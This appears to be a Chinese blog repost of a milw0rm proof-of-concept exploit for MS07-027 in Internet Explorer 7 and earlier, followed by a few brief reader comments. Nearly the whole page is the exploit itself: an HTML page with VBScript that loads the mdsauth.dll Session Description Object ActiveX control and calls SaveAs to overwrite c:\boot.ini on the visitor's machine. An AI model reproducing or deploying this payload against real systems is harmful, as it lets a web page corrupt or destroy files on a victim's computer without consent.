MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)

来源:milw0rm


<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>

<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">

</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://www.514.es"
target.SaveAs "c:\boot.ini"
</script>

</body>
</html>

相关日志

楼被抢了 2 层了... 抢座Rss 2.0或者 Trackback

  • LOVEBOBY

    2007-06-06 02:02:11

    今天才5.12…….

    什么显示。。。。。

  • ourfeeling

    本机运行测试, 对象属性不效

发表评论